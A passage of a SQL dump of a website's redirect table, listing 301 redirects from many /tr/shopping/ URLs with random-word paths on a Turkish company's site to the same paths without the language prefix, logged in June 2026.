00:00:00',301),(70048,'https://3s-technologies.com.tr/tr/shopping/muddily/2976228621.html',NULL,'https://3s-technologies.com.tr/shopping/muddily/2976228621.html','',1,0,'2026-06-11 01:53:43','0000-00-00 00:00:00',301),(70049,'https://3s-technologies.com.tr/tr/shopping/mottoed/1753380365.html',NULL,'https://3s-technologies.com.tr/shopping/mottoed/1753380365.html','',1,0,'2026-06-11 01:53:46','0000-00-00 00:00:00',301),(70050,'https://3s-technologies.com.tr/tr/shopping/noosing/1572084536.html',NULL,'https://3s-technologies.com.tr/shopping/noosing/1572084536.html','',1,0,'2026-06-11 01:53:49','0000-00-00 00:00:00',301),(70051,'https://3s-technologies.com.tr/tr/shopping/interhemal/3382154722.html',NULL,'https://3s-technologies.com.tr/shopping/interhemal/3382154722.html','',1,0,'2026-06-11 01:53:56','0000-00-00 00:00:00',301),(70052,'https://3s-technologies.com.tr/tr/shopping/extravagant/2186002602.html',NULL,'https://3s-technologies.com.tr/shopping/extravagant/2186002602.html','',1,0,'2026-06-11 01:53:59','0000-00-00 00:00:00',301),(70053,'https://3s-technologies.com.tr/tr/shopping/digger/1046705857.html',NULL,'https://3s-technologies.com.tr/shopping/digger/1046705857.html','',1,0,'2026-06-11 01:54:02','0000-00-00 00:00:00',301),(70054,'https://3s-technologies.com.tr/tr/shopping/mander/3668553352.html',NULL,'https://3s-technologies.com.tr/shopping/mander/3668553352.html','',1,0,'2026-06-11 01:54:05','0000-00-00 00:00:00',301),(70055,'https://3s-technologies.com.tr/tr/shopping/leafiness/637035630.html',NULL,'https://3s-technologies.com.tr/shopping/leafiness/637035630.html','',1,0,'2026-06-11 01:54:08','0000-00-00 00:00:00',301),(70056,'https://3s-technologies.com.tr/tr/shopping/halberdshaped/1168952598.html',NULL,'https://3s-technologies.com.tr/shopping/halberdshaped/1168952598.html','',1,0,'2026-06-11 01:54:11','0000-00-00 00:00:00',301),(70057,'https://3s-technologies.com.tr/tr/shopping/estrangle/105300005.html',NULL,'https://3s-technologies.com.tr/shopping/estrangle/105300005.html','',1,0,'2026-06-11 01:54:14','0000-00-00 00:00:00',301),(70058,'https://3s-technologies.com.tr/tr/shopping/hiped/98611318.html',NULL,'https://3s-technologies.com.tr/shopping/hiped/98611318.html','',1,0,'2026-06-11 01:54:17','0000-00-00 00:00:00',301),(70059,'https://3s-technologies.com.tr/tr/shopping/violently/464215469.html',NULL,'https://3s-technologies.com.tr/shopping/violently/464215469.html','',1,0,'2026-06-11 01:54:20','0000-00-00 00:00:00',301),(70060,'https://3s-technologies.com.tr/tr/shopping/aging/2972688393.html',NULL,'https://3s-technologies.com.tr/shopping/aging/2972688393.html','',1,0,'2026-06-11 01:54:23','0000-00-00 00:00:00',301),(70061,'https://3s-technologies.com.tr/tr/shopping/quaffing/1260711140.html',NULL,'https://3s-technologies.com.tr/shopping/quaffing/1260711140.html','',1,0,'2026-06-11 01:54:28','0000-00-00 00:00:00',301),(70062,'https://3s-technologies.com.tr/tr/shopping/tyrociny/1979238504.html',NULL,'https://3s-technologies.com.tr/shopping/tyrociny/1979238504.html','',1,0,'2026-06-11 01:54:31','0000-00-00 00:00:00',301),(70063,'https://3s-technologies.com.tr/tr/shopping/jagging/469344500.html',NULL,'https://3s-technologies.com.tr/shopping/jagging/469344500.html','',1,0,'2026-06-11 01:54:34','0000-00-00 00:00:00',301),(70064,'https://3s-technologies.com.tr/tr/shopping/prelector/840955212.html',NULL,'https://3s-technologies.com.tr/shopping/prelector/840955212.html','',1,0,'2026-06-11 01:54:37','0000-00-00 00:00:00',301),(70065,'https://3s-technologies.com.tr/tr/shopping/substile/220113473.html',NULL,'https://3s-technologies.com.tr/shopping/substile/220113473.html','',1,0,'2026-06-11 01:54:40','0000-00-00 00:00:00',301),(70066,'https://3s-technologies.com.tr/tr/shopping/dwindlement/3619190292.html',NULL,'https://3s-technologies.com.tr/shopping/dwindlement/3619190292.html','',1,0,'2026-06-11 01:54:43','0000-00-00 00:00:00',301),(70067,'https://3s-technologies.com.tr/tr/shopping/glimpsing/1975602223.html',NULL,'https://3s-technologies.com.tr/shopping/glimpsing/1975602223.html','',1,0,'2026-06-11 01:54:46','0000-00-00 00:00:00',301),(70068,'https://3s-technologies.com.tr/tr/shopping/reconduct/1179294666.html',NULL,'https://3s-technologies.com.tr/shopping/reconduct/1179294666.html','',1,0,'2026-06-11 01:54:49','0000-00-00 00:00:00',301),(70069,'https://3s-technologies.com.tr/tr/shopping/jumbling/1812688471.html',NULL,'https://3s-technologies.com.tr/shopping/jumbling/1812688471.html','',1,0,'2026-06-11 01:54:52','0000-00-00 00:00:00',301),(70070,'https://3s-technologies.com.tr/tr/shopping/antibacchius/809389604.html',NULL,'https://3s-technologies.com.tr/shopping/antibacchius/809389604.html','',1,0,'2026-06-11 01:54:55','0000-00-00 00:00:00',301),(70071,'https://3s-technologies.com.tr/tr/shopping/nummulation/2578365382.html',NULL,'https://3s-technologies.com.tr/shopping/nummulation/2578365382.html','',1,0,'2026-06-11 01:54:58','0000-00-00 00:00:00',301),(70072,'https://3s-technologies.com.tr/tr/shopping/amovability/339501376.html',NULL,'https://3s-technologies.com.tr/shopping/amovability/339501376.html','',1,0,'2026-06-11 01:55:01','0000-00-00 00:00:00',301),(70073,'https://3s-technologies.com.tr/tr/shopping/copperbottom/2272398614.html',NULL,'https://3s-technologies.com.tr/shopping/copperbottom/2272398614.html','',1,0,'2026-06-11 01:55:04','0000-00-00 00:00:00',301),(70074,'https://3s-technologies.com.tr/tr/shopping/pluralized/2138547337.html',NULL,'https://3s-technologies.com.tr/shopping/pluralized/2138547337.html','',1,0,'2026-06-11 01:55:07','0000-00-00 00:00:00',301),(70075,'https://3s-technologies.com.tr/tr/shopping/mendacious/1699151825.html',NULL,'https://3s-technologies.com.tr/shopping/mendacious/1699151825.html','',1,0,'2026-06-11 01:55:10','0000-00-00 00:00:00',301),(70076,'https://3s-technologies.com.tr/tr/shopping/depreciating/987497763.html',NULL,'https://3s-technologies.com.tr/shopping/depreciating/987497763.html','',1,0,'2026-06-11 01:55:13','0000-00-00 00:00:00',301),(70077,'https://3s-technologies.com.tr/tr/shopping/insuitable/3894226447.html',NULL,'https://3s-technologies.com.tr/shopping/insuitable/3894226447.html','',1,0,'2026-06-11 01:55:16','0000-00-00 00:00:00',301),(70078,'https://3s-technologies.com.tr/tr/shopping/authochthons/4176904806.html',NULL,'https://3s-technologies.com.tr/shopping/authochthons/4176904806.html','',1,0,'2026-06-11 01:55:19','0000-00-00 00:00:00',301),(70079,'https://3s-technologies.com.tr/tr/shopping/anoxic/3147419863.html',NULL,'https://3s-technologies.com.tr/shopping/anoxic/3147419863.html','',1,0,'2026-06-11 01:55:22','0000-00-00 00:00:00',301),(70080,'https://3s-technologies.com.tr/tr/shopping/bulse/3613225882.html',NULL,'https://3s-technologies.com.tr/shopping/bulse/3613225882.html','',1,0,'2026-06-11 01:55:25','0000-00-00 00:00:00',301),(70081,'https://3s-technologies.com.tr/tr/shopping/corinth/4101452742.html',NULL,'https://3s-technologies.com.tr/shopping/corinth/4101452742.html','',1,0,'2026-06-11 01:55:28','0000-00-00 00:00:00',301),(70082,'https://3s-technologies.com.tr/tr/shopping/stamine/4243242998.html',NULL,'https://3s-technologies.com.tr/shopping/stamine/4243242998.html','',1,0,'2026-06-11 01:55:33','0000-00-00 00:00:00',301),(70083,'https://3s-technologies.com.tr/tr/shopping/interrupted/3877641062.html',NULL,'https://3s-technologies.com.tr/shopping/interrupted/3877641062.html','',1,0,'2026-06-11 01:55:37','0000-00-00 00:00:00',301),(70084,'https://3s-technologies.com.tr/tr/shopping/aenaeus/3820757154.html',NULL,'https://3s-technologies.com.tr/shopping/aenaeus/3820757154.html','',1,0,'2026-06-11 01:55:40','0000-00-00 00:00:00',301),(70085,'https://3s-technologies.com.tr/tr/shopping/comboloio/3686513372.html',NULL,'https://3s-technologies.com.tr/shopping/comboloio/3686513372.html','',1,0,'2026-06-11 01:55:43','0000-00-00 00:00:00',301),(70086,'https://3s-technologies.com.tr/tr/shopping/totalling/2233493006.html',NULL,'https://3s-technologies.com.tr/shopping/totalling/2233493006.html','',1,0,'2026-06-11 01:55:46','0000-00-00 00:00:00',301),(70087,'https://3s-technologies.com.tr/tr/shopping/ragpicker/3236447518.html',NULL,'https://3s-technologies.com.tr/shopping/ragpicker/3236447518.html','',1,0,'2026-06-11 01:55:49','0000-00-00 00:00:00',301),(70088,'https://3s-technologies.com.tr/tr/shopping/quackism/620400894.html',NULL,'https://3s-technologies.com.tr/shopping/quackism/620400894.html','',1,0,'2026-06-11 01:55:52','0000-00-00 00:00:00',301),(70089,'https://3s-technologies.com.tr/tr/shopping/mysterizing/2919624345.html',NULL,'https://3s-technologies.com.tr/shopping/mysterizing/2919624345.html','',1,0,'2026-06-11 01:55:59','0000-00-00 00:00:00',301),(70090,'https://3s-technologies.com.tr/tr/shopping/holyday/3693871684.html',NULL,'https://3s-technologies.com.tr/shopping/holyday/3693871684.html','',1,0,'2026-06-11 01:56:01','0000-00-00 00:00:00',301),(70091,'https://3s-technologies.com.tr/tr/shopping/exclaiming/4214547977.html',NULL,'https://3s-technologies.com.tr/shopping/exclaiming/4214547977.html','',1,0,'2026-06-11 01:56:04','0000-00-00 00:00:00',301),(70092,'https://3s-technologies.com.tr/tr/shopping/younger/196170763.html',NULL,'https://3s-technologies.com.tr/shopping/younger/196170763.html','',1,0,'2026-06-11 01:56:07','0000-00-00 00:00:00',301),(70093,'https://3s-technologies.com.tr/tr/shopping/softshelled/3373648970.html',NULL,'https://3s-technologies.com.tr/shopping/softshelled/3373648970.html','',1,0,'2026-06-11 01:56:10','0000-00-00 00:00:00',301),(70094,'https://3s-technologies.com.tr/tr/shopping/chenomorphae/850785718.html',NULL,'https://3s-technologies.com.tr/shopping/chenomorphae/850785718.html','',1,0,'2026-06-11 01:56:13','0000-00-00 00:00:00',301),(70095,'https://3s-technologies.com.tr/tr/shopping/sweet/1007687048.html',NULL,'https://3s-technologies.com.tr/shopping/sweet/1007687048.html','',1,0,'2026-06-11 01:56:16','0000-00-00 00:00:00',301),(70096,'https://3s-technologies.com.tr/tr/shopping/prefidence/1697072227.html',NULL,'https://3s-technologies.com.tr/shopping/prefidence/1697072227.html','',1,0,'2026-06-11 01:56:21','0000-00-00 00:00:00',301),(70097,'https://3s-technologies.com.tr/tr/shopping/premunition/697267177.html',NULL,'https://3s-technologies.com.tr/shopping/premunition/697267177.html','',1,0,'2026-06-11 01:56:25','0000-00-00 00:00:00',301),(70098,'https://3s-technologies.com.tr/tr/shopping/keratode/3626783153.html',NULL,'https://3s-technologies.com.tr/shopping/keratode/3626783153.html','',1,0,'2026-06-11 01:56:28','0000-00-00 00:00:00',301),(70099,'https://3s-technologies.com.tr/tr/shopping/trochilos/2716611136.html',NULL,'https://3s-technologies.com.tr/shopping/trochilos/2716611136.html','',1,0,'2026-06-11 01:56:31','0000-00-00 00:00:00',301),(70100,'https://3s-technologies.com.tr/tr/shopping/polycracy/4164993872.html',NULL,'https://3s-technologies.com.tr/shopping/polycracy/4164993872.html','',1,0,'2026-06-11 01:56:34','0000-00-00 00:00:00',301),(70101,'https://3s-technologies.com.tr/tr/shopping/crunk/1006524213.html',NULL,'https://3s-technologies.com.tr/shopping/crunk/1006524213.html','',1,0,'2026-06-11 01:56:37','0000-00-00 00:00:00',301),(70102,'https://3s-technologies.com.tr/tr/shopping/meniver/2054710885.html',NULL,'https://3s-technologies.com.tr/shopping/meniver/2054710885.html','',1,0,'2026-06-11 01:56:40','0000-00-00 00:00:00',301),(70103,'https://3s-technologies.com.tr/tr/shopping/woaded/2582367338.html',NULL,'https://3s-technologies.com.tr/shopping/woaded/2582367338.html','',1,0,'2026-06-11 01:56:44','0000-00-00 00:00:00',301),(70104,'https://3s-technologies.com.tr/tr/shopping/coordination/2261930424.html',NULL,'https://3s-technologies.com.tr/shopping/coordination/2261930424.html','',1,0,'2026-06-11 01:56:46','0000-00-00 00:00:00',301),(70105,'https://3s-technologies.com.tr/tr/shopping/tailbay/2000595514.html',NULL,'https://3s-technologies.com.tr/shopping/tailbay/2000595514.html','',1,0,'2026-06-11 01:56:49','0000-00-00 00:00:00',301),(70106,'https://3s-technologies.com.tr/tr/shopping/scentingly/377229539.html',NULL,'https://3s-technologies.com.tr/shopping/scentingly/377229539.html','',1,0,'2026-06-11 01:56:52','0000-00-00 00:00:00',301),(70107,'https://3s-technologies.com.tr/tr/shopping/writhen/1371284395.html',NULL,'https://3s-technologies.com.tr/shopping/writhen/1371284395.html','',1,0,'2026-06-11 01:56:55','0000-00-00 00:00:00',301),(70108,'https://3s-technologies.com.tr/tr/shopping/paucispinus/1609812731.html',NULL,'https://3s-technologies.com.tr/shopping/paucispinus/1609812731.html','',1,0,'2026-06-11 01:56:58','0000-00-00 00:00:00',301),(70109,'https://3s-technologies.com.tr/tr/shopping/nonplus/1714427297.html',NULL,'https://3s-technologies.com.tr/shopping/nonplus/1714427297.html','',1,0,'2026-06-11 01:57:01','0000-00-00 00:00:00',301),(70110,'https://3s-technologies.com.tr/tr/shopping/pintle/131474033.html',NULL,'https://3s-technologies.com.tr/shopping/pintle/131474033.html','',1,0,'2026-06-11 01:57:04','0000-00-00 00:00:00',301),(70111,'https://3s-technologies.com.tr/tr/shopping/pitapat/3540336464.html',NULL,'https://3s-technologies.com.tr/shopping/pitapat/3540336464.html','',1,0,'2026-06-11 01:57:07','0000-00-00 00:00:00',301),(70112,'https://3s-technologies.com.tr/tr/shopping/coracoid/821520576.html',NULL,'https://3s-technologies.com.tr/shopping/coracoid/821520576.html','',1,0,'2026-06-11 01:57:10','0000-00-00 00:00:00',301),(70113,'https://3s-technologies.com.tr/tr/shopping/chassis/1147615921.html',NULL,'https://3s-technologies.com.tr/shopping/chassis/1147615921.html','',1,0,'2026-06-11 01:57:13','0000-00-00 00:00:00',301),(70114,'https://3s-technologies.com.tr/tr/shopping/apprehensively/886184925.html',NULL,'https://3s-technologies.com.tr/shopping/apprehensively/886184925.html','',1,0,'2026-06-11 01:57:16','0000-00-00 00:00:00',301),(70115,'https://3s-technologies.com.tr/tr/shopping/trapdoor/2932455302.html',NULL,'https://3s-technologies.com.tr/shopping/trapdoor/2932455302.html','',1,0,'2026-06-11 01:57:19','0000-00-00 00:00:00',301),(70116,'https://3s-technologies.com.tr/tr/shopping/stupefacient/2173236352.html',NULL,'https://3s-technologies.com.tr/shopping/stupefacient/2173236352.html','',1,0,'2026-06-11 01:57:22','0000-00-00 00:00:00',301),(70117,'https://3s-technologies.com.tr/tr/shopping/lugubriously/482082998.html',NULL,'https://3s-technologies.com.tr/shopping/lugubriously/482082998.html','',1,0,'2026-06-11 01:57:27','0000-00-00 00:00:00',301),(70118,'https://3s-technologies.com.tr/tr/shopping/ebionitism/548723543.html',NULL,'https://3s-technologies.com.tr/shopping/ebionitism/548723543.html','',1,0,'2026-06-11 01:57:29','0000-00-00 00:00:00',301),(70119,'https://3s-technologies.com.tr/tr/shopping/unilateral/1661200697.html',NULL,'https://3s-technologies.com.tr/shopping/unilateral/1661200697.html','',1,0,'2026-06-11 01:57:32','0000-00-00 00:00:00',301),(70120,'https://3s-technologies.com.tr/tr/shopping/coffle/4101537750.html',NULL,'https://3s-technologies.com.tr/shopping/coffle/4101537750.html','',1,0,'2026-06-11 01:57:35','0000-00-00 00:00:00',301),(70121,'https://3s-technologies.com.tr/tr/shopping/valencia/422445238.html',NULL,'https://3s-technologies.com.tr/shopping/valencia/422445238.html','',1,0,'2026-06-11 01:57:38','0000-00-00 00:00:00',301),(70122,'https://3s-technologies.com.tr/tr/shopping/hydriad/2602050505.html',NULL,'https://3s-technologies.com.tr/shopping/hydriad/2602050505.html','',1,0,'2026-06-11 01:57:41','0000-00-00 00:00:00',301),(70123,'https://3s-technologies.com.tr/tr/shopping/dispiriting/3260132641.html',NULL,'https://3s-technologies.com.tr/shopping/dispiriting/3260132641.html','',1,0,'2026-06-11 01:57:44','0000-00-00 00:00:00',301),(70124,'https://3s-technologies.com.tr/tr/shopping/distrain/2947553323.html',NULL,'https://3s-technologies.com.tr/shopping/distrain/2947553323.html','',1,0,'2026-06-11 01:57:47','0000-00-00 00:00:00',301),(70125,'https://3s-technologies.com.tr/tr/shopping/enfoldment/1374155359.html',NULL,'https://3s-technologies.com.tr/shopping/enfoldment/1374155359.html','',1,0,'2026-06-11 01:57:50','0000-00-00 00:00:00',301),(70126,'https://3s-technologies.com.tr/tr/shopping/ineffervescent/303209113.html',NULL,'https://3s-technologies.com.tr/shopping/ineffervescent/303209113.html','',1,0,'2026-06-11 01:57:53','0000-00-00 00:00:00',301),(70127,'https://3s-technologies.com.tr/tr/shopping/spent/4049213667.html',NULL,'https://3s-technologies.com.tr/shopping/spent/4049213667.html','',1,0,'2026-06-11 01:57:56','0000-00-00 00:00:00',301),(70128,'https://3s-technologies.com.tr/tr/shopping/silicle/1910937874.html',NULL,'https://3s-technologies.com.tr/shopping/silicle/1910937874.html','',1,0,'2026-06-11 01:57:59','0000-00-00 00:00:00',301),(70129,'https://3s-technologies.com.tr/tr/shopping/boylike/2660835816.html',NULL,'https://3s-technologies.com.tr/shopping/boylike/2660835816.html','',1,0,'2026-06-11 01:58:02','0000-00-00 00:00:00',301),(70130,'https://3s-technologies.com.tr/tr/shopping/venomously/4244986871.html',NULL,'https://3s-technologies.com.tr/shopping/venomously/4244986871.html','',1,0,'2026-06-11 01:58:05','0000-00-00 00:00:00',301),(70131,'https://3s-technologies.com.tr/tr/shopping/dewiness/255058152.html',NULL,'https://3s-technologies.com.tr/shopping/dewiness/255058152.html','',1,0,'2026-06-11 01:58:08','0000-00-00 00:00:00',301),(70132,'https://3s-technologies.com.tr/tr/shopping/recision/4208668591.html',NULL,'https://3s-technologies.com.tr/shopping/recision/4208668591.html','',1,0,'2026-06-11 01:58:11','0000-00-00 00:00:00',301),(70133,'https://3s-technologies.com.tr/tr/shopping/theosophically/4089427111.html',NULL,'https://3s-technologies.com.tr/shopping/theosophically/4089427111.html','',1,0,'2026-06-11 01:58:14','0000-00-00 00:00:00',301),(70134,'https://3s-technologies.com.tr/tr/shopping/royal/1889437642.html',NULL,'https://3s-technologies.com.tr/shopping/royal/1889437642.html','',1,0,'2026-06-11 01:58:17','0000-00-00 00:00:00',301),(70135,'https://3s-technologies.com.tr/tr/shopping/gallinacea/770945401.html',NULL,'https://3s-technologies.com.tr/shopping/gallinacea/770945401.html','',1,0,'2026-06-11 01:58:20','0000-00-00 00:00:00',301),(70136,'https://3s-technologies.com.tr/tr/shopping/piffle/642479718.html',NULL,'https://3s-technologies.com.tr/shopping/piffle/642479718.html','',1,0,'2026-06-11 01:58:23','0000-00-00 00:00:00',301),(70137,'https://3s-technologies.com.tr/tr/shopping/recoin/667587284.html',NULL,'https://3s-technologies.com.tr/shopping/recoin/667587284.html','',1,0,'2026-06-11 01:58:30','0000-00-00 00:00:00',301),(70138,'https://3s-technologies.com.tr/tr/shopping/humanitian/1456093639.html',NULL,'https://3s-technologies.com.tr/shopping/humanitian/1456093639.html','',1,0,'2026-06-11 01:58:33','0000-00-00 00:00:00',301),(70139,'https://3s-technologies.com.tr/tr/shopping/shrovetide/1812773479.html',NULL,'https://3s-technologies.com.tr/shopping/shrovetide/1812773479.html','',1,0,'2026-06-11 01:58:36','0000-00-00 00:00:00',301),(70140,'https://3s-technologies.com.tr/tr/shopping/acherontic/1103076150.html',NULL,'https://3s-technologies.com.tr/shopping/acherontic/1103076150.html','',1,0,'2026-06-11 01:58:39','0000-00-00 00:00:00',301),(70141,'https://3s-technologies.com.tr/tr/shopping/fraulein/2687145427.html',NULL,'https://3s-technologies.com.tr/shopping/fraulein/2687145427.html','',1,0,'2026-06-11 01:58:42','0000-00-00 00:00:00',301),(70142,'https://3s-technologies.com.tr/tr/shopping/chanceful/3702462444.html',NULL,'https://3s-technologies.com.tr/shopping/chanceful/3702462444.html','',1,0,'2026-06-11 01:58:45','0000-00-00 00:00:00',301),(70143,'https://3s-technologies.com.tr/tr/shopping/blastomere/839991644.html',NULL,'https://3s-technologies.com.tr/shopping/blastomere/839991644.html','',1,0,'2026-06-11 01:58:48','0000-00-00 00:00:00',301),(70144,'https://3s-technologies.com.tr/tr/shopping/emergences/3384663912.html',NULL,'https://3s-technologies.com.tr/shopping/emergences/3384663912.html','',1,0,'2026-06-11 01:58:51','0000-00-00 00:00:00',301),(70145,'https://3s-technologies.com.tr/tr/shopping/pistillate/3573783780.html',NULL,'https://3s-technologies.com.tr/shopping/pistillate/3573783780.html','',1,0,'2026-06-11 01:58:54','0000-00-00 00:00:00',301),(70146,'https://3s-technologies.com.tr/tr/shopping/patrolmen/2080981724.html',NULL,'https://3s-technologies.com.tr/shopping/patrolmen/2080981724.html','',1,0,'2026-06-11 01:58:57','0000-00-00 00:00:00',301),(70147,'https://3s-technologies.com.tr/tr/shopping/pillwillet/1731993901.html',NULL,'https://3s-technologies.com.tr/shopping/pillwillet/1731993901.html','',1,0,'2026-06-11 01:59:00','0000-00-00 00:00:00',301),(70148,'https://3s-technologies.com.tr/tr/shopping/ghastful/1630587960.html',NULL,'https://3s-technologies.com.tr/shopping/ghastful/1630587960.html','',1,0,'2026-06-11 01:59:03','0000-00-00 00:00:00',301),(70149,'https://3s-technologies.com.tr/tr/shopping/cranesbill/2050777273.html',NULL,'https://3s-technologies.com.tr/shopping/cranesbill/2050777273.html','',1,0,'2026-06-11 01:59:06','0000-00-00 00:00:00',301),(70150,'https://3s-technologies.com.tr/tr/shopping/tritium/1939652542.html',NULL,'https://3s-technologies.com.tr/shopping/tritium/1939652542.html','',1,0,'2026-06-11 01:59:09','0000-00-00 00:00:00',301),(70151,'https://3s-technologies.com.tr/tr/shopping/myrmidon/1885667569.html',NULL,'https://3s-technologies.com.tr/shopping/myrmidon/1885667569.html','',1,0,'2026-06-11 01:59:12','0000-00-00 00:00:00',301),(70152,'https://3s-technologies.com.tr/tr/shopping/assuage/1804203068.html',NULL,'https://3s-technologies.com.tr/shopping/assuage/1804203068.html','',1,0,'2026-06-11 01:59:15','0000-00-00 00:00:00',301),(70153,'https://3s-technologies.com.tr/tr/shopping/hydrastine/2456720037.html',NULL,'https://3s-technologies.com.tr/shopping/hydrastine/2456720037.html','',1,0,'2026-06-11 01:59:18','0000-00-00 00:00:00',301),(70154,'https://3s-technologies.com.tr/tr/shopping/semicubical/2874707870.html',NULL,'https://3s-technologies.com.tr/shopping/semicubical/2874707870.html','',1,0,'2026-06-11 01:59:21','0000-00-00 00:00:00',301),(70155,'https://3s-technologies.com.tr/tr/shopping/floodage/4279759078.html',NULL,'https://3s-technologies.com.tr/shopping/floodage/4279759078.html','',1,0,'2026-06-11 01:59:24','0000-00-00 00:00:00',301),(70156,'https://3s-technologies.com.tr/tr/shopping/nyctibius/1347523504.html',NULL,'https://3s-technologies.com.tr/shopping/nyctibius/1347523504.html','',1,0,'2026-06-11 01:59:27','0000-00-00 00:00:00',301),(70157,'https://3s-technologies.com.tr/tr/shopping/remittor/3951013544.html',NULL,'https://3s-technologies.com.tr/shopping/remittor/3951013544.html','',1,0,'2026-06-11 01:59:30','0000-00-00 00:00:00',301),(70158,'https://3s-technologies.com.tr/tr/shopping/idahoan/2347807541.html',NULL,'https://3s-technologies.com.tr/shopping/idahoan/2347807541.html','',1,0,'2026-06-11 01:59:38','0000-00-00 00:00:00',301),(70159,'https://3s-technologies.com.tr/tr/shopping/inordinacy/3187789453.html',NULL,'https://3s-technologies.com.tr/shopping/inordinacy/3187789453.html','',1,0,'2026-06-11 01:59:41','0000-00-00 00:00:00',301),(70160,'https://3s-technologies.com.tr/tr/shopping/inamoratos/2762696589.html',NULL,'https://3s-technologies.com.tr/shopping/inamoratos/2762696589.html','',1,0,'2026-06-11 01:59:44','0000-00-00 00:00:00',301),(70161,'https://3s-technologies.com.tr/tr/shopping/sanguinolent/3291123699.html',NULL,'https://3s-technologies.com.tr/shopping/sanguinolent/3291123699.html','',1,0,'2026-06-11 01:59:47','0000-00-00 00:00:00',301),(70162,'https://3s-technologies.com.tr/tr/shopping/inverness/4217881529.html',NULL,'https://3s-technologies.com.tr/shopping/inverness/4217881529.html','',1,0,'2026-06-11 01:59:54','0000-00-00 00:00:00',301),(70163,'https://3s-technologies.com.tr/tr/shopping/quindecemvirate/2996245387.html',NULL,'https://3s-technologies.com.tr/shopping/quindecemvirate/2996245387.html','',1,0,'2026-06-11 01:59:56','0000-00-00 00:00:00',301),(70164,'https://3s-technologies.com.tr/tr/shopping/handygripe/446589048.html',NULL,'https://3s-technologies.com.tr/shopping/handygripe/446589048.html','',1,0,'2026-06-11 01:59:59','0000-00-00 00:00:00',301),(70165,'https://3s-technologies.com.tr/tr/shopping/misspending/3148588825.html',NULL,'https://3s-technologies.com.tr/shopping/misspending/3148588825.html','',1,0,'2026-06-11 02:00:02','0000-00-00 00:00:00',301),(70166,'https://3s-technologies.com.tr/tr/shopping/scrimped/317086054.html',NULL,'https://3s-technologies.com.tr/shopping/scrimped/317086054.html','',1,0,'2026-06-11 02:00:05','0000-00-00 00:00:00',301),(70167,'https://3s-technologies.com.tr/tr/shopping/inductoria/2221959140.html',NULL,'https://3s-technologies.com.tr/shopping/inductoria/2221959140.html','',1,0,'2026-06-11 02:00:08','0000-00-00 00:00:00',301),(70168,'https://3s-technologies.com.tr/tr/shopping/impaired/1800826379.html',NULL,'https://3s-technologies.com.tr/shopping/impaired/1800826379.html','',1,0,'2026-06-11 02:00:11','0000-00-00 00:00:00',301),(70169,'https://3s-technologies.com.tr/tr/shopping/muskadel/3673767423.html',NULL,'https://3s-technologies.com.tr/shopping/muskadel/3673767423.html','',1,0,'2026-06-11 02:00:14','0000-00-00 00:00:00',301),(70170,'https://3s-technologies.com.tr/tr/shopping/homunculi/2575354368.html',NULL,'https://3s-technologies.com.tr/shopping/homunculi/2575354368.html','',1,0,'2026-06-11 02:00:17','0000-00-00 00:00:00',301),(70171,'https://3s-technologies.com.tr/tr/shopping/cysticerce/2808596889.html',NULL,'https://3s-technologies.com.tr/shopping/cysticerce/2808596889.html','',1,0,'2026-06-11 02:00:20','0000-00-00 00:00:00',301),(70172,'https://3s-technologies.com.tr/tr/shopping/larcenies/2021819677.html',NULL,'https://3s-technologies.com.tr/shopping/larcenies/2021819677.html','',1,0,'2026-06-11 02:00:23','0000-00-00 00:00:00',301),(70173,'https://3s-technologies.com.tr/tr/shopping/eyeservant/1807608704.html',NULL,'https://3s-technologies.com.tr/shopping/eyeservant/1807608704.html','',1,0,'2026-06-11 02:00:26','0000-00-00 00:00:00',301),(70174,'https://3s-technologies.com.tr/tr/shopping/ingenerabillty/176113729.html',NULL,'https://3s-technologies.com.tr/shopping/ingenerabillty/176113729.html','',1,0,'2026-06-11 02:00:29','0000-00-00 00:00:00',301),(70175,'https://3s-technologies.com.tr/tr/shopping/alantin/3011678661.html',NULL,'https://3s-technologies.com.tr/shopping/alantin/3011678661.html','',1,0,'2026-06-11 02:00:32','0000-00-00 00:00:00',301),(70176,'https://3s-technologies.com.tr/tr/shopping/adsuki/2674122462.html',NULL,'https://3s-technologies.com.tr/shopping/adsuki/2674122462.html','',1,0,'2026-06-11 02:00:35','0000-00-00 00:00:00',301),(70177,'https://3s-technologies.com.tr/tr/shopping/ampere/3262410764.html',NULL,'https://3s-technologies.com.tr/shopping/ampere/3262410764.html','',1,0,'2026-06-11 02:00:38','0000-00-00 00:00:00',301),(70178,'https://3s-technologies.com.tr/tr/shopping/gillhouse/329657767.html',NULL,'https://3s-technologies.com.tr/shopping/gillhouse/329657767.html','',1,0,'2026-06-11 02:00:41','0000-00-00 00:00:00',301),(70179,'https://3s-technologies.com.tr/tr/shopping/boblincoln/3581778220.html',NULL,'https://3s-technologies.com.tr/shopping/boblincoln/3581778220.html','',1,0,'2026-06-11 02:00:44','0000-00-00 00:00:00',301),(70180,'https://3s-technologies.com.tr/tr/shopping/ptilosclera/2211945969.html',NULL,'https://3s-technologies.com.tr/shopping/ptilosclera/2211945969.html','',1,0,'2026-06-11 02:00:47','0000-00-00 00:00:00',301),(70181,'https://3s-technologies.com.tr/tr/shopping/tachistoscope/934612361.html',NULL,'https://3s-technologies.com.tr/shopping/tachistoscope/934612361.html','',1,0,'2026-06-11 02:00:50','0000-00-00 00:00:00',301),(70182,'https://3s-technologies.com.tr/tr/shopping/metronymic/2903172214.html',NULL,'https://3s-technologies.com.tr/shopping/metronymic/2903172214.html','',1,0,'2026-06-11 02:00:53','0000-00-00 00:00:00',301),(70183,'https://3s-technologies.com.tr/tr/shopping/featness/3742185197.html',NULL,'https://3s-technologies.com.tr/shopping/featness/3742185197.html','',1,0,'2026-06-11 02:09:38','0000-00-00 00:00:00',301),(70184,'https://3s-technologies.com.tr/tr/shopping/fluorescin/1815112685.html',NULL,'https://3s-technologies.com.tr/shopping/fluorescin/1815112685.html','',1,0,'2026-06-11 02:09:42','0000-00-00 00:00:00',301),(70185,'https://3s-technologies.com.tr/tr/shopping/heedlessness/3674634890.html',NULL,'https://3s-technologies.com.tr/shopping/heedlessness/3674634890.html','',1,0,'2026-06-11 02:09:45','0000-00-00 00:00:00',301),(70186,'https://3s-technologies.com.tr/tr/shopping/pathogeny/1101402307.html',NULL,'https://3s-technologies.com.tr/shopping/pathogeny/1101402307.html','',1,0,'2026-06-11 02:09:48','0000-00-00 00:00:00',301),(70187,'https://3s-technologies.com.tr/tr/shopping/schlich/3170196869.html',NULL,'https://3s-technologies.com.tr/shopping/schlich/3170196869.html','',1,0,'2026-06-11 02:09:51','0000-00-00 00:00:00',301),(70188,'https://3s-technologies.com.tr/tr/shopping/affright/3444739489.html',NULL,'https://3s-technologies.com.tr/shopping/affright/3444739489.html','',1,0,'2026-06-11 